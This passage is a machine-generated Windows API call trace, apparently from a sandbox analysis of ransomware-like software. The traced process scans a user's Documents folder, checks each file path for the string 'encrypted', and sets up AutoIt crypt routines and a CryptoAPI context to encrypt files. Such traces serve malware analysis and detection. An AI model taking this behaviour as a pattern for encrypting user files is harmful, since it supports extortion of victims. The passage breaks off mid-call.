lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a510, ftCreationTime.dwHighDateTime=0x1d5bf45, ftLastAccessTime.dwLowDateTime=0x281b25a0, ftLastAccessTime.dwHighDateTime=0x1d5bbff, ftLastWriteTime.dwLowDateTime=0x281b25a0, ftLastWriteTime.dwHighDateTime=0x1d5bbff, nFileSizeHigh=0x0, nFileSizeLow=0x17561, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pCRLZ1TsEuAv.rtf", cAlternateFileName="PCRLZ1~1.RTF")) returned 0x7c20c0 [0033.699] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.699] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pCRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CRLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RLZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZ1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TsEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sEuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EuAv.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.702] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.702] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.702] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.703] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.703] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.703] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.703] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a510, ftCreationTime.dwHighDateTime=0x1d5bf45, ftLastAccessTime.dwLowDateTime=0x281b25a0, ftLastAccessTime.dwHighDateTime=0x1d5bbff, ftLastWriteTime.dwLowDateTime=0x281b25a0, ftLastWriteTime.dwHighDateTime=0x1d5bbff, nFileSizeHigh=0x0, nFileSizeLow=0x17561, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="pCRLZ1TsEuAv.rtf", cAlternateFileName="PCRLZ1~1.RTF")) returned 0x7c2100 [0033.703] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.703] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.703] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.703] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.703] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.703] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.704] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.704] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.704] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.704] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.705] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.718] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.718] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.718] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, 